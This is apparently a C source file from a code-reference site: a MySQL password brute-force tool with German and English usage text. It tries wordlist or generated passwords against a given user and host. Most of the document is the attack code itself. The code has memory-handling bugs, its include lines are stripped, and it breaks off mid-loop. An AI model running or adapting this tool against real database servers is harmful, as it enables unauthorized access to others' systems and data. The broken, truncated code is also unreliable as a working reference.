===== MySQL Bruteforce ===== written while a boring day\\ more information on http://code-reference.com #include #include #include #include #include // Deutsch oder English #define GER 1 #define ENG 0 /* ************************************************************************************************** * MYSQL Bruteforce Programm aus purer lange Weile geschrieben * 23.03 2010 by cd * * gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall * oder -O6 anstatt -O2 * ./mysql-bruteforce benutzer computer kennwortliste * log Datei ist "mysql-bruteforce.log" * ************************************************************************************************** ************************************************************************************************** * * for the people that understand no german change the #define ENG to 1 and GER to 0 * * compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall * or -O6 instead of -O2 * usage: ./mysql-bruteforce user host * log file is "mysql-bruteforce.log" * ************************************************************************************************** * * Newest version http://code-reference.com * * Think about the old good time MoD * If you want to survive out here, you've got to know where your towel is. */ MYSQL *my; int count=0; char *passwd; #define STARTCHR 46 // 33 set start ascii char #define ENDCHR 122 // 127 set end ascii cahr #define BUFF_SIZE 1024 #define LEN 80 char buffer[BUFF_SIZE]; int jump=0; int main (int argc, char *argv[]) { if (argc <= 3 ) { #if ENG && !GER printf("\n" "\n MySQL Bruteforce, written by cd\n\n" " via wordlist\n" " %s root localhost wordlist # use complete wordlist\n" " %s root ../wordlist 7 # serch only words with 7 chars\n" "\n" " standard bruteforce\n" " %s root localhost -b # Bruteforce Method (standard up to 8 chars)\n" " %s root -b 12 # up to 12 chars\n" " %s root host -b 12 Test # start with the given Word\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]); #else printf("\n" "\n MySQL Bruteforce, geschrieben von cd\n\n" " via Wörterliste\n" " %s root localhost wordlist # Gesamte Wörterliste durchsuchen\n" " %s root ../wordlist 7 # suche nur Wörter mit 7 Buchstaben\n" "\n" " Standard Bruteforce\n" " %s root localhost -b # Bruteforce Methode (standard bis zu 8 Buchstaben)\n" " %s root -b 12 # bis zu 12 Buchstaben\n" " %s root host -b 12 Test # Startet mit angegebenen Wort\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]); #endif return 0; } if(strcmp(argv[3],"-b")) { jump=0; } else jump=1; initscr(); printw("\n#################################\n#\tMYSQL Bruteforce\t#\n#\t2010 by cd\t\t#\n#################################\n\n\t\n"); refresh(); char host[20]; char user[20]; my = mysql_init(NULL); FILE *pass_list,*logfile; if( ( pass_list=fopen(argv[3],"r") ) == NULL && jump!=1 ) { #if ENG && !GER fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]); #else fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]); #endif endwin(); return 0; } if( ( logfile=fopen("mysql-bruteforce.log","a+") ) == NULL ) { #if ENG && !GER fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]); #else fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]); #endif endwin(); return 0; } if(my == NULL) { #if ENG && !GER fprintf(stderr, "Initialization failed\n"); #else fprintf(stderr, "Initialisierung fehlgeschlagen\n"); #endif endwin(); return 0; } sprintf(user, "%s", argv[1]); sprintf(host, "%s", argv[2]); char eingabe; #if ENG && !GER mvprintw(5,2,"User: %s Host: %s ",user,host); #else mvprintw(5,2,"Benutzer: %s Server: %s ",user,host); #endif if (jump==1) { refresh(); eingabe='b'; } else {eingabe='w';} switch(eingabe) { case 'b': while(1) { int min=1,max; if (argc<=4) { max=8; } else { max=atoi(argv[4]); } char *pass=(char*)malloc(min); int pos,x,found; pass[min]='\0'; if (argc>=6) { min=strlen(argv[5]); pass=argv[5]; pass[min+1]='\0'; pos=min; if (atoi(argv[4])!=strlen(argv[5])) { #if ENG && !GER mvprintw(7,0,"len of word must be the same the digit after -b\n" "like: %s root localhost -b 4 abcd\n",argv[0]); #else mvprintw(7,0,"länge des Wortes muss die gleiche seien wie die zahl nach -b\n" "z.B: %s root localhost -b 4 abcd\n",argv[0]); #endif refresh(); endwin(); return 0; } } for(x=min;x<=max;x++) { if(x>min) { if (realloc(pass, x)) { memset(pass, STARTCHR, x); pass[x]='\0'; } else { mvprintw(13,1,"error in realloc"); endwin(); return 1; } } while(pass[0]